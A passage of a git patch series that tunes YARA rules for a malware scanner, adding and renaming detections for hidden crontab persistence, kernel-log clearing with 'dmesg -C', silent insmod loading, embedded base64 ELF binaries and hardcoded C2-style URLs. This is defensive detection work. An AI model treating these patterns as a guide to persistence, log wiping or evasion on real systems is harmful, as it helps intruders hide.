$ref = "getrlimit" fullword + $go = "Getrlimit" fullword + + condition: + any of them +} diff --git a/rules/discover/process/uid.yara b/rules/discover/process/uid.yara new file mode 100644 index 000000000..ca7fa609b --- /dev/null +++ b/rules/discover/process/uid.yara @@ -0,0 +1,12 @@ +rule getuid: harmless { + meta: + syscall = "getuid" + description = "returns the user id of the current process" + + strings: + $getuid = "getuid" fullword + $Getuid = "Getuid" fullword + + condition: + any of them +} diff --git a/rules/discover/process/working_directory.yara b/rules/discover/process/working_directory.yara new file mode 100644 index 000000000..32276c274 --- /dev/null +++ b/rules/discover/process/working_directory.yara @@ -0,0 +1,24 @@ +rule getcwd: harmless { + meta: + pledge = "rpath" + syscall = "getcwd" + + strings: + $getcwd = "getcwd" fullword + + condition: + any of them +} + +rule getwd: harmless { + meta: + pledge = "rpath" + syscall = "getwd" + + strings: + $getwd = "getwd" fullword + $go_Getwd = "Getwd" fullword + + condition: + any of them +} From 565c199b6f813aa4068653f8b5be6224023fecb5 Mon Sep 17 00:00:00 2001 From: Thomas Stromberg Date: Sun, 10 Nov 2024 11:45:58 -0500 Subject: [PATCH 6/7] rule tuning --- pkg/action/testdata/scan_archive | 5 +- rules/c2/addr/url.yara | 12 ++-- rules/data/embedded/embedded-base64-elf.yara | 10 ++++ .../system_network.yara => multiple.yara} | 0 rules/discover/network/connectivity.yara | 11 ++++ .../{interface-get.yara => interface.yara} | 0 rules/discover/process/name.yara | 2 +- .../system/{cpu-info.yara => cpu.yara} | 0 rules/discover/system/dev_full.yara | 2 +- rules/discover/system/dmesg.yara | 10 ++++ .../{hardware-info.yara => hardware.yara} | 0 .../{hostname-get.yara => hostname.yara} | 0 ...{hostinfo_collector.yara => multiple.yara} | 0 rules/evasion/file/attr/chflags.yara | 11 ++++ rules/evasion/file/location/multiple.yara | 19 ++++++ .../indicator_blocking/hidden_window.yara | 54 ++++++++++++++++++ rules/evasion/logging/dmesg.yara | 13 +++++ .../{linux_kernel.yara => kernel.yara} | 0 rules/evasion/rootkit/posix_userspace.yara | 12 ---- .../{linux_userspace.yara => userspace.yara} | 13 +++++ rules/exec/program/hidden.yara | 2 +- rules/impact/remote_access/backdoor.yara | 2 +- rules/impact/remote_access/botnet.yara | 9 +-- rules/net/dns/dns-over-https.yara | 1 + rules/net/ip/spoof.yara | 5 +- rules/persist/cron/echo_crontab.yara | 12 ---- rules/persist/cron/etc_cron_d.yara | 12 ++++ rules/persist/cron/hidden_crontab.yara | 17 ------ rules/persist/cron/{crontab.yara => tab.yara} | 32 ++++++++++- .../{module-load.yara => insert.yara} | 46 +++++++++------ rules/persist/kernel_module/module.yara | 20 ++++++- rules/sus/geopolitics.yara | 9 +++ rules/sus/malicious.yara | 3 +- tests/does-nothing/does-nothing.simple | 4 +- .../2022.an-instance.99.10.9/index.js.simple | 2 +- .../clean/203.b7219352.chunk.js.simple | 1 + ...4796BB27126E03A7E25DD5D589.cache.js.simple | 2 +- ...D016DDDA0665CB8CD8EEA6C537.cache.js.simple | 2 +- tests/javascript/clean/bash.js.simple | 3 +- .../javascript/clean/highlight.esm.js.simple | 2 +- tests/javascript/clean/highlight.js.simple | 2 +- tests/javascript/clean/mode-php.js.simple | 2 +- .../clean/mode-php_laravel_blade.js.simple | 2 +- tests/javascript/clean/php.js.simple | 2 +- tests/javascript/clean/prism-bash.js.simple | 3 +- .../javascript/clean/prism-bash.min.js.simple | 3 +- .../clean/scripts.c88fecd373e21509.js.simple | 3 +- tests/linux/2021.FontOnLake/45E9.elf.simple | 9 +-- tests/linux/2021.XMR-Stak/1b1a56.elf.simple | 4 +- .../2022.Symbiote/kerneldev.so.bkp.simple | 2 +- tests/linux/2022.ez-pwnkit/payload.simple | 4 +- .../freedownloadmanager.sdiff | 5 +- tests/linux/2023.Kinsing/install.sh.simple | 1 + .../eight-nebraska-autumn-illinois.simple | 8 +-- .../uranus-ack-mike-cat.simple | 4 +- tests/linux/2024.chisel/crondx.simple | 4 +- ...4084b7471bc5aed1c81803054f017240a72.simple | 4 +- tests/linux/2024.gas/gas.simple | 4 +- .../emp3r0r.agent.simple | 6 +- .../2024.kworker_pretenders/gafgyt.simple | 2 + tests/linux/2024.medusa/rkload.simple | 6 +- tests/linux/clean/appsec-rules.json.simple | 3 +- tests/linux/clean/busybox.simple | 5 +- tests/linux/clean/caddy.simple | 4 +- tests/linux/clean/chezmoi.simple | 4 +- tests/linux/clean/chrome.simple | 2 +- tests/linux/clean/clickhouse.simple | 9 +-- tests/linux/clean/code-oss.md | 8 +-- tests/linux/clean/containerd.simple | 5 +- tests/linux/clean/cpack.md | 6 +- tests/linux/clean/default_config.json.simple | 3 +- ...f01-4f43-a872-605b678968b0_111.json.simple | 2 +- .../kibana/securitySolution.chunk.9.js.simple | 3 +- tests/linux/clean/kuma-cp.simple | 5 +- tests/linux/clean/ld-2.27.so.simple | 2 +- tests/linux/clean/libgcj.so.17.0.0.simple | 4 +- tests/linux/clean/libgcj.so.17.simple | 4 +- tests/linux/clean/ls.x86_64.md | 16 +++--- tests/linux/clean/melange.simple | 5 +- .../linux/clean/misp_sample.ndjson.log.simple | 4 +- tests/linux/clean/mongosh.simple | 4 +- tests/linux/clean/opa.simple | 4 +- tests/linux/clean/pandoc.md | 7 ++- tests/linux/clean/ping.x86_64.md | 4 +- tests/linux/clean/pulumi.simple | 4 +- .../clean/pypi_package_index.json.simple | 2 +- tests/linux/clean/qemu-system-xtensa.md | 1 + tests/linux/clean/rules.json.simple | 3 +- tests/linux/clean/searchindex.json.simple | 4 +- tests/linux/clean/slack.md | 4 +- tests/linux/clean/slirp4netns.simple | 2 +- tests/linux/clean/sudo.simple | 4 +- tests/linux/clean/trivy.simple | 5 +- tests/linux/clean/trufflehog.md | 6 +- tests/linux/clean/wolfictl.simple | 5 +- .../2023.3CX/libffmpeg.change_decrease.mdiff | Bin 39788 -> 39788 bytes .../2023.3CX/libffmpeg.change_increase.mdiff | 2 +- tests/macOS/2023.3CX/libffmpeg.decrease.mdiff | Bin 39788 -> 39788 bytes tests/macOS/2023.3CX/libffmpeg.dirty.mdiff | 2 +- tests/macOS/2023.3CX/libffmpeg.increase.mdiff | 2 +- .../2024.BeaverTail/client_5346.py.simple | 1 + tests/macOS/2024.Ezuri/libdpt1.so.simple | 2 +- tests/macOS/2024.LightSpy/dropper.simple | 4 +- tests/macOS/2024.Rustdoor/localfile.simple | 11 ++-- .../macOS/2024.cobaltstrike/EDnFsVAEbP.simple | 2 +- tests/macOS/clean/ls.mdiff | 16 +++--- tests/macOS/clean/ls.sdiff.trigger_2 | 2 +- tests/macOS/clean/ls.sdiff.trigger_3 | 2 +- tests/npm/2024.harthat/deference.js.simple | 2 +- .../package.json.simple | 2 +- .../2024.next-react-notify/tocall.js.simple | 2 +- .../2024.persona-tool/preinstall.js.simple | 2 +- tests/php/clean/composer-2.7.7.simple | 2 +- .../valyrian_debug_setup.py.simple | 2 +- tests/python/2023.JokerSpy/shared.dat.simple | 2 +- tests/python/2024.Custom.RAT/output.py.simple | 2 +- .../2024.GitHub.Clipper/main.exe.simple | 2 +- .../windows/2024.GitHub.Clipper/raw.py.simple | 3 +- .../windows/2024.aspdasdksa2/creal.pyc.simple | 2 +- .../Swashbuckle.AspNetCore.ReDoc.dll.simple | 1 + 120 files changed, 436 insertions(+), 227 deletions(-) create mode 100644 rules/data/embedded/embedded-base64-elf.yara rename rules/discover/{system/system_network.yara => multiple.yara} (100%) create mode 100644 rules/discover/network/connectivity.yara rename rules/discover/network/{interface-get.yara => interface.yara} (100%) rename rules/discover/system/{cpu-info.yara => cpu.yara} (100%) create mode 100644 rules/discover/system/dmesg.yara rename rules/discover/system/{hardware-info.yara => hardware.yara} (100%) rename rules/discover/system/{hostname-get.yara => hostname.yara} (100%) rename rules/discover/system/{hostinfo_collector.yara => multiple.yara} (100%) create mode 100644 rules/evasion/file/attr/chflags.yara create mode 100644 rules/evasion/file/location/multiple.yara create mode 100644 rules/evasion/indicator_blocking/hidden_window.yara create mode 100644 rules/evasion/logging/dmesg.yara rename rules/evasion/rootkit/{linux_kernel.yara => kernel.yara} (100%) delete mode 100644 rules/evasion/rootkit/posix_userspace.yara rename rules/evasion/rootkit/{linux_userspace.yara => userspace.yara} (94%) delete mode 100644 rules/persist/cron/echo_crontab.yara create mode 100644 rules/persist/cron/etc_cron_d.yara delete mode 100644 rules/persist/cron/hidden_crontab.yara rename rules/persist/cron/{crontab.yara => tab.yara} (64%) rename rules/persist/kernel_module/{module-load.yara => insert.yara} (81%) create mode 100644 rules/sus/geopolitics.yara diff --git a/pkg/action/testdata/scan_archive b/pkg/action/testdata/scan_archive index 25eb1da4c..0b61fe87b 100644 --- a/pkg/action/testdata/scan_archive +++ b/pkg/action/testdata/scan_archive @@ -25,8 +25,9 @@ discover/network/interface_list: medium discover/network/mac_address: medium discover/network/netstat: medium discover/processes/pgrep: medium -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/dmesg: low +discover/system/hostname: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low diff --git a/rules/c2/addr/url.yara b/rules/c2/addr/url.yara index 430344def..49d3a22fc 100644 --- a/rules/c2/addr/url.yara +++ b/rules/c2/addr/url.yara @@ -53,20 +53,20 @@ rule http_url_with_question: medium { filesize < 256KB and any of ($f*) and $ref and none of ($not*) } -rule binary_php_url_with_question: high { +rule binary_url_with_question: high { meta: - description = "contains hardcoded endpoint with a question mark" + description = "binary contains hardcoded URL with question mark" strings: - $ref = /https*:\/\/[\w\.\/]{8,160}\.php\?[\w\=\&]{0,32}/ + $ref = /https*:\/\/[\w\.\/]{8,160}\.(asp|php|exe|dll)\?[\w\=\&]{0,32}/ condition: filesize < 150MB and elf_or_macho and $ref } -rule script_php_url_with_question: high { +rule script_url_with_question: high { meta: - description = "contains hardcoded endpoint with a question mark" + description = "script contains hardcoded URL with question mark" strings: $f_import = "import" fullword @@ -77,7 +77,7 @@ rule script_php_url_with_question: high { $f_requests_post = "requests.post" fullword $f_urllib = "urllib.request" fullword $f_urlopen = "urlopen" fullword - $ref = /https*:\/\/[\w\.\/]{8,160}\.php\?[\w\=\&]{0,32}/ + $ref = /https*:\/\/[\w\.\/]{8,160}\.(asp|php|exe|dll)\?[\w\=\&]{0,32}/ condition: filesize < 256KB and any of ($f*) and $ref diff --git a/rules/data/embedded/embedded-base64-elf.yara b/rules/data/embedded/embedded-base64-elf.yara new file mode 100644 index 000000000..350411a80 --- /dev/null +++ b/rules/data/embedded/embedded-base64-elf.yara @@ -0,0 +1,10 @@ +rule base64_elf: high { + meta: + description = "Contains base64 encoded ELF binary" + + strings: + $header = "f0VMRgEBAQ" + + condition: + $header +} diff --git a/rules/discover/system/system_network.yara b/rules/discover/multiple.yara similarity index 100% rename from rules/discover/system/system_network.yara rename to rules/discover/multiple.yara diff --git a/rules/discover/network/connectivity.yara b/rules/discover/network/connectivity.yara new file mode 100644 index 000000000..02e2f5114 --- /dev/null +++ b/rules/discover/network/connectivity.yara @@ -0,0 +1,11 @@ + +rule network_connectivity : low { + meta: + description = "checks Internet connectivity" + + strings: + $ref = "http://www.msftncsi.com/ncsi.txt" + + condition: + any of them +} diff --git a/rules/discover/network/interface-get.yara b/rules/discover/network/interface.yara similarity index 100% rename from rules/discover/network/interface-get.yara rename to rules/discover/network/interface.yara diff --git a/rules/discover/process/name.yara b/rules/discover/process/name.yara index 7238cff81..eb1a72e48 100644 --- a/rules/discover/process/name.yara +++ b/rules/discover/process/name.yara @@ -1,4 +1,4 @@ -rule progname: medium { +rule progname: low { meta: description = "get the current process name" ref = "https://linux.die.net/man/3/program_invocation_short_name" diff --git a/rules/discover/system/cpu-info.yara b/rules/discover/system/cpu.yara similarity index 100% rename from rules/discover/system/cpu-info.yara rename to rules/discover/system/cpu.yara diff --git a/rules/discover/system/dev_full.yara b/rules/discover/system/dev_full.yara index 5cf54b19a..ee88bdd61 100644 --- a/rules/discover/system/dev_full.yara +++ b/rules/discover/system/dev_full.yara @@ -1,4 +1,4 @@ -rule dev_full: medium linux { +rule dev_full: low linux { meta: description = "tests full disk behavior" diff --git a/rules/discover/system/dmesg.yara b/rules/discover/system/dmesg.yara new file mode 100644 index 000000000..d702f0060 --- /dev/null +++ b/rules/discover/system/dmesg.yara @@ -0,0 +1,10 @@ +rule dmesg { + meta: + description = "accesses the kernel log ring buffer" + + strings: + $dmesg = "dmesg" fullword + + condition: + any of them +} \ No newline at end of file diff --git a/rules/discover/system/hardware-info.yara b/rules/discover/system/hardware.yara similarity index 100% rename from rules/discover/system/hardware-info.yara rename to rules/discover/system/hardware.yara diff --git a/rules/discover/system/hostname-get.yara b/rules/discover/system/hostname.yara similarity index 100% rename from rules/discover/system/hostname-get.yara rename to rules/discover/system/hostname.yara diff --git a/rules/discover/system/hostinfo_collector.yara b/rules/discover/system/multiple.yara similarity index 100% rename from rules/discover/system/hostinfo_collector.yara rename to rules/discover/system/multiple.yara diff --git a/rules/evasion/file/attr/chflags.yara b/rules/evasion/file/attr/chflags.yara new file mode 100644 index 000000000..a562cbdd7 --- /dev/null +++ b/rules/evasion/file/attr/chflags.yara @@ -0,0 +1,11 @@ +rule chflags_hidden : high { + meta: + description = "hides files using chflags" + ref = "https://man.freebsd.org/cgi/man.cgi?chflags(1)" + + strings: + $chflags = /chflags.{0,3} hidden [\w\.\/]{0,24}/ + + condition: + any of them +} diff --git a/rules/evasion/file/location/multiple.yara b/rules/evasion/file/location/multiple.yara new file mode 100644 index 000000000..ee1f07fb2 --- /dev/null +++ b/rules/evasion/file/location/multiple.yara @@ -0,0 +1,19 @@ +rule multiple_elf: high linux { + meta: + description = "references multiple system paths, may be trying to hide content" + + strings: + $ = /\/dev\/shm\/[\%\w\-\/\.]{0,64}/ + $ = /\/dev\/mqueue\/[\%\w\-\/\.]{0,64}/ + $ = /\/var\/tmp\/[\%\w\-\/\.]{0,64}/ + $ = /\/tmp\/[\%\w\-\/\.]{0,64}/ fullword + $ = /\/bin\/[\%\w\-\/\.]{0,64}/ fullword + $ = /\/usr\/bin\/[\%\w\-\/\.]{0,64}/ + $ = /\/etc\/cron\.d[\%\w\-\/\.]{0,64}/ + $ = /\/etc\/crontab/ + $ = /\/var\/log\/[\%\w\-\/\.]{0,64}/ + $ = /\/var\/spool\/[\%\w\-\/\.]{0,64}/ + + condition: + filesize < 1MB and uint32(0) == 1179403647 and 80% of them +} diff --git a/rules/evasion/indicator_blocking/hidden_window.yara b/rules/evasion/indicator_blocking/hidden_window.yara new file mode 100644 index 000000000..e17c82436 --- /dev/null +++ b/rules/evasion/indicator_blocking/hidden_window.yara @@ -0,0 +1,54 @@ + +rule subprocess_CREATE_NO_WINDOW: medium { + meta: + description = "runs commands, hides windows" + + strings: + $sub = "subprocess" + $no_window = "CREATE_NO_WINDOW" + + condition: + filesize < 32KB and all of them +} + +private rule pythonSetup { + strings: + $if_distutils = /from distutils.core import .{0,32}setup/ + $if_setuptools = /from setuptools import .{0,32}setup/ + $i_setuptools = "import setuptools" + $setup = "setup(" + + $not_setup_example = ">>> setup(" + $not_setup_todict = "setup(**config.todict()" + $not_import_quoted = "\"from setuptools import setup" + $not_setup_quoted = "\"setup(name=" + $not_distutils = "from distutils.errors import" + + condition: + filesize < 128KB and $setup and any of ($i*) in (0..1024) and none of ($not*) +} + +rule subprocess_CREATE_NO_WINDOW_setuptools: high { + meta: + description = "runs commands, hides windows" + + strings: + $sub = "subprocess" + $no_window = "CREATE_NO_WINDOW" + + condition: + filesize < 32KB and pythonSetup and all of them +} + +rule subprocess_CREATE_NO_WINDOW_high: high { + meta: + description = "runs commands, hides windows" + + strings: + $s_sub = "subprocess" + $s_no_window = "CREATE_NO_WINDOW" + + $o_discord = "discordapp.com" + condition: + filesize < 32KB and all of ($s*) and any of ($o*) +} \ No newline at end of file diff --git a/rules/evasion/logging/dmesg.yara b/rules/evasion/logging/dmesg.yara new file mode 100644 index 000000000..2d5e6f5e5 --- /dev/null +++ b/rules/evasion/logging/dmesg.yara @@ -0,0 +1,13 @@ +rule dmesg_clear: critical linux { + meta: + description = "clears the kernel log ring buffer" + + strings: + $ = "dmesg -C" fullword + $ = "dmesg -c" fullword + $ = "dmesg --clear" fullword + $ = "dmesg --read-clear" fullword + + condition: + filesize < 150MB and any of them +} diff --git a/rules/evasion/rootkit/linux_kernel.yara b/rules/evasion/rootkit/kernel.yara similarity index 100% rename from rules/evasion/rootkit/linux_kernel.yara rename to rules/evasion/rootkit/kernel.yara diff --git a/rules/evasion/rootkit/posix_userspace.yara b/rules/evasion/rootkit/posix_userspace.yara deleted file mode 100644 index 8ae649c5c..000000000 --- a/rules/evasion/rootkit/posix_userspace.yara +++ /dev/null @@ -1,12 +0,0 @@ -rule readdir_intercept_source: high { - meta: - description = "userland rootkit source designed to hide files (DECLARE_READDIR)" - filetypes = "so,c" - - strings: - $declare = "DECLARE_READDIR" - $hide = "hide" - - condition: - filesize < 200KB and all of them -} diff --git a/rules/evasion/rootkit/linux_userspace.yara b/rules/evasion/rootkit/userspace.yara similarity index 94% rename from rules/evasion/rootkit/linux_userspace.yara rename to rules/evasion/rootkit/userspace.yara index e7c42b737..91106a0b2 100644 --- a/rules/evasion/rootkit/linux_userspace.yara +++ b/rules/evasion/rootkit/userspace.yara @@ -1,3 +1,16 @@ +rule readdir_intercept_source: high { + meta: + description = "userland rootkit source designed to hide files (DECLARE_READDIR)" + filetypes = "so,c" + + strings: + $declare = "DECLARE_READDIR" + $hide = "hide" + + condition: + filesize < 200KB and all of them +} + rule readdir_intercept: high { meta: description = "userland rootkit designed to hide files (readdir64)" diff --git a/rules/exec/program/hidden.yara b/rules/exec/program/hidden.yara index 2797027c3..be6cc6a9e 100644 --- a/rules/exec/program/hidden.yara +++ b/rules/exec/program/hidden.yara @@ -1,4 +1,4 @@ -rule relative_hidden_launcher { +rule relative_hidden_launcher : medium { strings: $relative_hidden = /\.\/\.[\w][\w\/\.\_\-]{3,16}/ fullword $x_exec = "exec" diff --git a/rules/impact/remote_access/backdoor.yara b/rules/impact/remote_access/backdoor.yara index 98612b88f..bdc825193 100644 --- a/rules/impact/remote_access/backdoor.yara +++ b/rules/impact/remote_access/backdoor.yara @@ -10,7 +10,7 @@ private rule wordlist { filesize < 100MB and 3 of them } -rule backdoor: high { +rule backdoor: medium { meta: description = "References a 'backdoor'" hash_2023_UPX_0c25a05bdddc144fbf1ffa29372481b50ec6464592fdfb7dec95d9e1c6101d0d_elf_x86_64 = "818b80a08418f3bb4628edd4d766e4de138a58f409a89a5fdba527bab8808dd2" diff --git a/rules/impact/remote_access/botnet.yara b/rules/impact/remote_access/botnet.yara index b6062c164..82f1ab9e2 100644 --- a/rules/impact/remote_access/botnet.yara +++ b/rules/impact/remote_access/botnet.yara @@ -1,15 +1,16 @@ rule bot: medium { meta: - description = "References a 'botnet'" + description = "References a 'bot'" strings: - $bot_deployed = "bot deployed" - $botnet = "Botnet" + $BOTDIR = "BOTDIR" + $botdir = "botdir" condition: - filesize < 20MB and any of them + filesize < 1MB and any of them } + rule botnet_high: high { meta: description = "References a 'botnet'" diff --git a/rules/net/dns/dns-over-https.yara b/rules/net/dns/dns-over-https.yara index 255614bc7..b4eb8aada 100644 --- a/rules/net/dns/dns-over-https.yara +++ b/rules/net/dns/dns-over-https.yara @@ -11,6 +11,7 @@ rule doh_refs: medium { $contentType = "application/dns-message" $dnspod = "dnspod" $doh_url = "doh-url" fullword + $cloudflare = "https://9.9.9.9/dns-query" condition: any of them diff --git a/rules/net/ip/spoof.yara b/rules/net/ip/spoof.yara index 5891a27fa..4183e229a 100644 --- a/rules/net/ip/spoof.yara +++ b/rules/net/ip/spoof.yara @@ -7,8 +7,9 @@ rule spoof: medium { strings: $spoof = /[a-zA-Z\-_ ]{0,16}spoof[a-zA-Z\-_ ]{0,16}/ fullword - $Spoof = /[a-zA-Z\-_ ]{0,16}Spoof[a-zA-Z\-_ ]{0,16}/ fullword + $spoof2 = /[a-zA-Z\-_ ]{0,16}Spoof[a-zA-Z\-_ ]{0,16}/ fullword + $not_chk = "Spoofchk" condition: - any of them + any of ($s*) and none of ($not*) } diff --git a/rules/persist/cron/echo_crontab.yara b/rules/persist/cron/echo_crontab.yara deleted file mode 100644 index 3a2ed0633..000000000 --- a/rules/persist/cron/echo_crontab.yara +++ /dev/null @@ -1,12 +0,0 @@ -rule echo_crontab: high { - meta: - hash_2020_Enigma = "6b2ff7ae79caf306c381a55409c6b969c04b20c8fda25e6d590e0dadfcf452de" - hash_2024_Chaos_1d36 = "1d36f4bebd21a01c12fde522defee4c6b4d3d574c825ecc20a2b7a8baa122819" - hash_2024_Chaos_1fc4 = "1fc412b47b736f8405992e3744690b58ec4d611c550a1b4f92f08dfdad5f7a30" - - strings: - $echo = /echo.{0,10}\* \* \* \*.{0,24}cron[\w\/ \-]{0,16}/ - - condition: - $echo -} diff --git a/rules/persist/cron/etc_cron_d.yara b/rules/persist/cron/etc_cron_d.yara new file mode 100644 index 000000000..00c7cfdb5 --- /dev/null +++ b/rules/persist/cron/etc_cron_d.yara @@ -0,0 +1,12 @@ +rule cron_d_user: high { + meta: + description = "Uses /etc/cron.d to persist" + + strings: + $c_etc_crontab = /\/etc\/cron\.d\/[\w\.\-\%\/]{1,16}/ + + $not_usage = "usage: cron" + + condition: + filesize < 52428800 and any of ($c*) and none of ($not*) +} diff --git a/rules/persist/cron/hidden_crontab.yara b/rules/persist/cron/hidden_crontab.yara deleted file mode 100644 index 9743db792..000000000 --- a/rules/persist/cron/hidden_crontab.yara +++ /dev/null @@ -1,17 +0,0 @@ -rule hidden_crontab: critical { - meta: - description = "persists via a hidden crontab entry" - hash_2024_Chaos_1d36 = "1d36f4bebd21a01c12fde522defee4c6b4d3d574c825ecc20a2b7a8baa122819" - hash_2024_Chaos_1fc4 = "1fc412b47b736f8405992e3744690b58ec4d611c550a1b4f92f08dfdad5f7a30" - hash_2024_Chaos_27cd = "27cdb8d8f64ce395795fdbde10cf3a08e7b217c92b7af89cde22abbf951b9e99" - - strings: - $crontab = "crontab" - $c_periodic_with_user = /\*[\/\d]{0,3} \* \* \* \* [a-z]{1,12} [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/ - $c_periodic = /\*[\/\d]{0,3} \* \* \* \* [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/ - $c_nickname_with_user = /\@(reboot|yearly|annually|monthly|weekly|daily|hourly) [a-z]{1,12} [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/ - $c_nickname = /\@(reboot|yearly|annually|monthly|weekly|daily|hourly) [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/ - - condition: - $crontab and any of ($c_*) -} diff --git a/rules/persist/cron/crontab.yara b/rules/persist/cron/tab.yara similarity index 64% rename from rules/persist/cron/crontab.yara rename to rules/persist/cron/tab.yara index 20ac884bc..c3720fe5c 100644 --- a/rules/persist/cron/crontab.yara +++ b/rules/persist/cron/tab.yara @@ -17,7 +17,6 @@ rule crontab_writer: medium { hash_2023_ZIP_server = "b69738c655dee0071b1ce37ab5227018ebce01ba5e90d28bd82d63c46e9e63a4" strings: - $c_etc_crontab = /\/etc\/cron[\/\w\.]{0,32}/ $c_crontab_e = "crontab -" $c_var_spool_cron = "/var/spool/cron" $not_usage = "usage: cron" @@ -66,3 +65,34 @@ rule crontab_danger_path: high { condition: filesize < 104857600 and any of them } + +rule hidden_crontab: critical { + meta: + description = "persists via a hidden crontab entry" + hash_2024_Chaos_1d36 = "1d36f4bebd21a01c12fde522defee4c6b4d3d574c825ecc20a2b7a8baa122819" + hash_2024_Chaos_1fc4 = "1fc412b47b736f8405992e3744690b58ec4d611c550a1b4f92f08dfdad5f7a30" + hash_2024_Chaos_27cd = "27cdb8d8f64ce395795fdbde10cf3a08e7b217c92b7af89cde22abbf951b9e99" + + strings: + $crontab = "crontab" + $c_periodic_with_user = /\*[\/\d]{0,3} \* \* \* \* [a-z]{1,12} [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/ + $c_periodic = /\*[\/\d]{0,3} \* \* \* \* [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/ + $c_nickname_with_user = /\@(reboot|yearly|annually|monthly|weekly|daily|hourly) [a-z]{1,12} [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/ + $c_nickname = /\@(reboot|yearly|annually|monthly|weekly|daily|hourly) [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/ + + condition: + $crontab and any of ($c_*) +} + +rule echo_crontab: high { + meta: + hash_2020_Enigma = "6b2ff7ae79caf306c381a55409c6b969c04b20c8fda25e6d590e0dadfcf452de" + hash_2024_Chaos_1d36 = "1d36f4bebd21a01c12fde522defee4c6b4d3d574c825ecc20a2b7a8baa122819" + hash_2024_Chaos_1fc4 = "1fc412b47b736f8405992e3744690b58ec4d611c550a1b4f92f08dfdad5f7a30" + + strings: + $echo = /echo.{0,10}\* \* \* \*.{0,24}cron[\w\/ \-]{0,16}/ + + condition: + $echo +} diff --git a/rules/persist/kernel_module/module-load.yara b/rules/persist/kernel_module/insert.yara similarity index 81% rename from rules/persist/kernel_module/module-load.yara rename to rules/persist/kernel_module/insert.yara index 7f64e2059..8efd49b77 100644 --- a/rules/persist/kernel_module/module-load.yara +++ b/rules/persist/kernel_module/insert.yara @@ -1,30 +1,24 @@ -rule init_module: medium linux { +rule kernel_module_loader: high linux { meta: - description = "Linux kernel module" - syscall = "init_module" - capability = "CAP_SYS_MODULE" - hash_2023_Linux_Malware_Samples_5d63 = "5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf" - hash_2023_Linux_Malware_Samples_b82d = "b82d4d3d7f3a31bf2ad88315f52cb544aa4d9b786e3db61fdfabd25a790de410" - hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d" - filetypes = "ko,elf,so" + description = "loads Linux kernel module via insload" + hash_2023_init_d_vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d" + hash_2023_rc0_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d" + hash_2023_rc1_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d" strings: - $ref = "init_module" fullword + $insmod = /insmod [ \$\%\w\.\/_-]{1,32}/ condition: - filesize < 1MB and all of them + filesize < 10MB and all of them } -rule kernel_module_loader: high linux { +rule kernel_module_loader_sus: high linux { meta: - description = "loads Linux kernel module via insload" - hash_2023_init_d_vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d" - hash_2023_rc0_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d" - hash_2023_rc1_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d" + description = "suspiciously loads Linux kernel module via insload" strings: - $insmod = /insmod [ \$\%\w\.\/_-]{1,32}\.ko/ - + $insmod = /insmod [ \$\%\w\.\/_-]{1,32} .{0,16}\/dev\/null 2\>\&1/ + condition: filesize < 10MB and all of them } @@ -41,3 +35,21 @@ rule cha_cha_tests: override linux { condition: filesize < 2KB and any of them } + +rule init_module: medium linux { + meta: + description = "Linux kernel module" + syscall = "init_module" + capability = "CAP_SYS_MODULE" + hash_2023_Linux_Malware_Samples_5d63 = "5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf" + hash_2023_Linux_Malware_Samples_b82d = "b82d4d3d7f3a31bf2ad88315f52cb544aa4d9b786e3db61fdfabd25a790de410" + hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d" + filetypes = "ko,elf,so" + + strings: + $ref = "init_module" fullword + + condition: + filesize < 1MB and all of them +} + diff --git a/rules/persist/kernel_module/module.yara b/rules/persist/kernel_module/module.yara index a0833f10c..ab71b2f1f 100644 --- a/rules/persist/kernel_module/module.yara +++ b/rules/persist/kernel_module/module.yara @@ -1,6 +1,8 @@ +import "elf" + rule lkm: medium { meta: - description = "Contains a Linux kernel module" + description = "Linux kernel module" capability = "CAP_SYS_MODULE" hash_2023_Linux_Malware_Samples_5d63 = "5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf" hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d" @@ -14,6 +16,22 @@ rule lkm: medium { all of them } +rule lkm_embedded_in_elf: high { + meta: + description = "Contains embedded Linux kernel module" + capability = "CAP_SYS_MODULE" + hash_2023_Linux_Malware_Samples_5d63 = "5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf" + hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d" + hash_2023_LQvKibDTq4_diamorphine_mod = "e394d87045c800a63bd4d295e635ff8a03624255c3fd85fe8e6957807f1cb569" + + strings: + $vergmagic = "vermagic=" + $srcversion = "srcversion=" + + condition: + elf.type == elf.ET_EXEC and all of them +} + rule delete_module: medium { meta: description = "Unload Linux kernel module" diff --git a/rules/sus/geopolitics.yara b/rules/sus/geopolitics.yara new file mode 100644 index 000000000..9c40cb51f --- /dev/null +++ b/rules/sus/geopolitics.yara @@ -0,0 +1,9 @@ +rule ukraine: medium { + meta: + description = "Glory to Ukraine!" + strings: + $ref = "слава Украине!" + + condition: + any of them +} diff --git a/rules/sus/malicious.yara b/rules/sus/malicious.yara index 9c4540d06..ff9913619 100644 